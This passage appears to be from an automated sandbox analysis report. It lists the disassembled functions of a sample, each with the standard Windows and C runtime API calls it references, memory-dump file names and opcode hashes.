                                                                                                          • Instruction Fuzzy Hash: 1EE04F3290021CBBCF122F60DC04ADE3F57EF44761F044416FD0569321CB729921AAD5
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00009BF0), ref: 006C9ACC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: 680d38dff26b1d7d84566a4d9ae3f4d3c5eeb7e43580a26d6e11bc8ea134f0cf
                                                                                                          • Instruction ID: 1645ff95450b7ef4385ac70a19261d6566b5a74e2c52288a331f948d713839d5
                                                                                                          • Opcode Fuzzy Hash: 680d38dff26b1d7d84566a4d9ae3f4d3c5eeb7e43580a26d6e11bc8ea134f0cf
                                                                                                          • Instruction Fuzzy Hash:
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 54951025-0
                                                                                                          • Opcode ID: 91aae1b1fc72a3d0f9b64af66e22eb3bc3c86e1d419588a6345339848b85048f
                                                                                                          • Instruction ID: f7135cce7a34c8f8dfa784cfabce51d99c6332aee685bc862b9d5d6f014e8008
                                                                                                          • Opcode Fuzzy Hash: 91aae1b1fc72a3d0f9b64af66e22eb3bc3c86e1d419588a6345339848b85048f
                                                                                                          • Instruction Fuzzy Hash: 42A01130202202CBA3008F30AE88A0E3AEAAA0A2C03082028A020C8030EB208080EA00
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fc4d4afdc598b4e83fbbed18201acfb092fd67b7abed91270afadc9e17c9cbe3
                                                                                                          • Instruction ID: 665e59763549aec90c5000ac63dab5820b2a457c746a056eec6ff50317d6e3f5
                                                                                                          • Opcode Fuzzy Hash: fc4d4afdc598b4e83fbbed18201acfb092fd67b7abed91270afadc9e17c9cbe3
                                                                                                          • Instruction Fuzzy Hash: 9DD0927A641A58AFC310CF49E440D41F7B9FB8D670B158166EA0893B20C331FC11CAE0
                                                                                                          APIs
                                                                                                          • GetCPInfo.KERNEL32(02F005F8,02F005F8,00000000,7FFFFFFF,?,006E412D,02F005F8,02F005F8,00000000,02F005F8,?,?,?,?,02F005F8,00000000), ref: 006E41E8
                                                                                                          • __alloca_probe_16.LIBCMT ref: 006E42A3
                                                                                                          • __alloca_probe_16.LIBCMT ref: 006E4332
                                                                                                          • __freea.LIBCMT ref: 006E437D
                                                                                                          • __freea.LIBCMT ref: 006E4383
                                                                                                          • __freea.LIBCMT ref: 006E43B9
                                                                                                          • __freea.LIBCMT ref: 006E43BF
                                                                                                          • __freea.LIBCMT ref: 006E43CF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                                          • String ID:
                                                                                                          • API String ID: 127012223-0
                                                                                                          • Opcode ID: 3da5b5913a87424e6bcf33e99bff481660df684587e8b615b8a8b2c3037def7f
                                                                                                          • Instruction ID: 67e2f6273e195eea468e57f86b657494f05805c0a83859fc58e270b2f959a82b
                                                                                                          • Opcode Fuzzy Hash: 3da5b5913a87424e6bcf33e99bff481660df684587e8b615b8a8b2c3037def7f
                                                                                                          • Instruction Fuzzy Hash: 6871C1329013859ADF20AEB68C41FFE77ABAF49350F290159F914EB381EF759D0087A4
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 3213747228-0
                                                                                                          • Opcode ID: f554dfed4cc89bd749be7eac31dadc435ba424f0d2cac0941ac8dd753f5d47f1
                                                                                                          • Instruction ID: 6b363523dc4633402371d2f35a00bd64e81b204f7cd28d4ad2eee28e62d97940
                                                                                                          • Opcode Fuzzy Hash: f554dfed4cc89bd749be7eac31dadc435ba424f0d2cac0941ac8dd753f5d47f1
                                                                                                          • Instruction Fuzzy Hash: 03B16632D013969FDB218F68CC85BFE7BA6EF59350F14416AE904AB382DA749D01C7A0
                                                                                                          APIs
                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 006D4ADB
                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 006D4D54
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                                          • String ID: csm$csm$csm$xfn
                                                                                                          • API String ID: 2673424686-305129718
                                                                                                          • Opcode ID: 1aa397b1bef986af9e65c45b19d4fc95c9b254c090c93ff67894295a17899835
                                                                                                          • Instruction ID: a033ce138899878234963caf1e0fab75f74c859d8313aee410f07890b9d52334
                                                                                                          • Opcode Fuzzy Hash: 1aa397b1bef986af9e65c45b19d4fc95c9b254c090c93ff67894295a17899835
                                                                                                          • Instruction Fuzzy Hash: 85B14471C01219EBCF28DFA4C8819AEBBB6FF14310B14416BE9116B316DB71DE51CBA5
                                                                                                          APIs
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006CAC47
                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 006CAC4F
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006CACD8
                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 006CAD03
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006CAD58
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                          • Opcode ID: 0dbacf6863de2c08953ff49ef7ced63146bcabb064ebec3636938779f03432fe
                                                                                                          • Instruction ID: 19b2a1f84b8328c17191ec5ebc1fb50a983422959f29f545855829ae820d2cee
                                                                                                          • Opcode Fuzzy Hash: 0dbacf6863de2c08953ff49ef7ced63146bcabb064ebec3636938779f03432fe
                                                                                                          • Instruction Fuzzy Hash: 6141A230E0021C9BCF10EFA8C885EAE7BA3EF45318F14815AE8159B352D735AE15CBD6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a531445ac54c1ae80cf6b526e34022b9e4a5960da20ba06fd633c34d033f087b
                                                                                                          • Instruction ID: 687477f443cda2c1ef3a684553add0255c1ddabca16d3566bedc93ee035329ff
                                                                                                          • Opcode Fuzzy Hash: a531445ac54c1ae80cf6b526e34022b9e4a5960da20ba06fd633c34d033f087b
                                                                                                          • Instruction Fuzzy Hash: F8B10170E0139AAFDB11DF5AC895BFD7BB7AF16310F144249E411AB392C7B09A42CB60
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(?,?,006D40D3,006CA9DD,006C9C34), ref: 006D40EA
                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006D40F8
                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006D4111
                                                                                                          • SetLastError.KERNEL32(00000000,006D40D3,006CA9DD,006C9C34), ref: 006D4163
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3852720340-0
                                                                                                          • Opcode ID: 69449f94724db45ad2d8ba12ce1ca990fac870c24a9da5b62d6d560353e63d2a
                                                                                                          • Instruction ID: a8a41959641f969de0ac97b16e5550582cdad4e6dc1e876967de5bda046e0e9a
                                                                                                          • Opcode Fuzzy Hash: 69449f94724db45ad2d8ba12ce1ca990fac870c24a9da5b62d6d560353e63d2a
                                                                                                          • Instruction Fuzzy Hash: 9801D432A0A3165FB7642B74BCC65B72697DB62375B20123FF520A53F2FEA24C41D684
                                                                                                          APIs
                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6BA95F62,?,?,00000000,006E56A4,000000FF,?,006CF319,006CF200,?,006CF3B5,00000000), ref: 006CF28D
                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006CF29F
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,006E56A4,000000FF,?,006CF319,006CF200,?,006CF3B5,00000000), ref: 006CF2C1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                          • Opcode ID: dca1e3b166d4bcb833ac2eeacb15dbd2bfe53e3a063bd4eecf7ab0196ba29901
                                                                                                          • Instruction ID: 31f0ec6dfd76a9be7a3c6e01d40a4ac6a9884729d189ad57deff91857f852d54
                                                                                                          • Opcode Fuzzy Hash: dca1e3b166d4bcb833ac2eeacb15dbd2bfe53e3a063bd4eecf7ab0196ba29901
                                                                                                          • Instruction Fuzzy Hash: 5301A236940795ABDB018F80CC45FFEBBBAFB04B15F00062AFC12A62A0DB759900CA80
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 006C7859
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006C7864
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006C78D2
                                                                                                            • Part of subcall function 006C774F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 006C7767
                                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 006C787F
                                                                                                          • _Yarn.LIBCPMT ref: 006C7895
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                          • String ID:
                                                                                                          • API String ID: 1088826258-0
                                                                                                          • Opcode ID: 71fc25e41a1f8c1056146debabbbb326db208cef5b153fec13cd972151857ec4
                                                                                                          • Instruction ID: ef7a70199d41bc448de90bbac322d765599dd1449cf1f69fcff2d508b12e204e
                                                                                                          • Opcode Fuzzy Hash: 71fc25e41a1f8c1056146debabbbb326db208cef5b153fec13cd972151857ec4
                                                                                                          • Instruction Fuzzy Hash: 9301BCB5A056149BCB46EF20C849A7C7B63FF95380B14041DE8025B382CF34AE06CFD9
                                                                                                          APIs
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,006DF65D,00000000,?,006F1E18,?,?,?,006DF594,00000004,InitializeCriticalSectionEx,006E90D4,006E90DC), ref: 006DF5CE
                                                                                                          • GetLastError.KERNEL32(?,006DF65D,00000000,?,006F1E18,?,?,?,006DF594,00000004,InitializeCriticalSectionEx,006E90D4,006E90DC,00000000,?,006D500C), ref: 006DF5D8
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 006DF600
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                          • String ID: api-ms-
                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                          • Opcode ID: 4d30357ed03cd5d9dd56456e710180a1604a57bfecd667e220f3216d5371ffde
                                                                                                          • Instruction ID: 166dc264aa3b3acd9c2bee358aba4ec5532fb591cdcd99603f4b1fc518f61e57
                                                                                                          • Opcode Fuzzy Hash: 4d30357ed03cd5d9dd56456e710180a1604a57bfecd667e220f3216d5371ffde
                                                                                                          • Instruction Fuzzy Hash: 45E04F30A85384B7EB201B62EC4AB9D3B979B10B51F244031F90DAC6F2DBA2E8509959
                                                                                                          APIs
                                                                                                          • GetConsoleOutputCP.KERNEL32(6BA95F62,00000000,00000000,?), ref: 006DD421
                                                                                                            • Part of subcall function 006D5471: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006D6C45,?,00000000,-00000008), ref: 006D54D2
                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006DD673
                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006DD6B9
                                                                                                          • GetLastError.KERNEL32 ref: 006DD75C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 2112829910-0
                                                                                                          • Opcode ID: 2f047f946fa38397c38c952af5e5041382b539d2c19d13c0913d53be21d5217e
                                                                                                          • Instruction ID: 7e654446a10ae64200f688476df8e629b9d27da3274b236fdd5a2105a229fb9f
                                                                                                          • Opcode Fuzzy Hash: 2f047f946fa38397c38c952af5e5041382b539d2c19d13c0913d53be21d5217e
                                                                                                          • Instruction Fuzzy Hash: 70D14AB5D042589FCF15DFA8D880AEDBBF6FF09314F28416AE466EB351D630A942CB50
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustPointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 1740715915-0
                                                                                                          • Opcode ID: c7578f95a455e3f191f7591e8af6711bbd362c25df8946a359d47251d8c898c2
                                                                                                          • Instruction ID: 290a2f462a62074062990e4b61bf86dc63b04f614bea5bd8ba6b7114c614a8fb
                                                                                                          • Opcode Fuzzy Hash: c7578f95a455e3f191f7591e8af6711bbd362c25df8946a359d47251d8c898c2
                                                                                                          • Instruction Fuzzy Hash: B951E172E05246AFDB288F50C881BBAB3A6FF05340F24412FE81997791EB31EC41DB90
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D5471: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006D6C45,?,00000000,-00000008), ref: 006D54D2
                                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 006DB24A
                                                                                                          • __dosmaperr.LIBCMT ref: 006DB251
                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 006DB28B
                                                                                                          • __dosmaperr.LIBCMT ref: 006DB292
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 1913693674-0
                                                                                                          • Opcode ID: 91193064c462a4d00d0ee22b6b853d02cca50bf9238de22d25f322905e60aa99
                                                                                                          • Instruction ID: 2b0b43f8fc2bb98f4bc8ddfb17423b32418e6fc2ef92712456ede86c7f5f4c03
                                                                                                          • Opcode Fuzzy Hash: 91193064c462a4d00d0ee22b6b853d02cca50bf9238de22d25f322905e60aa99
                                                                                                          • Instruction Fuzzy Hash: 19219072E00205EFDB20AF618881D7FB7AAEF02364712561EF8599B751DB30EE418B90
                                                                                                          Memory Dump Source
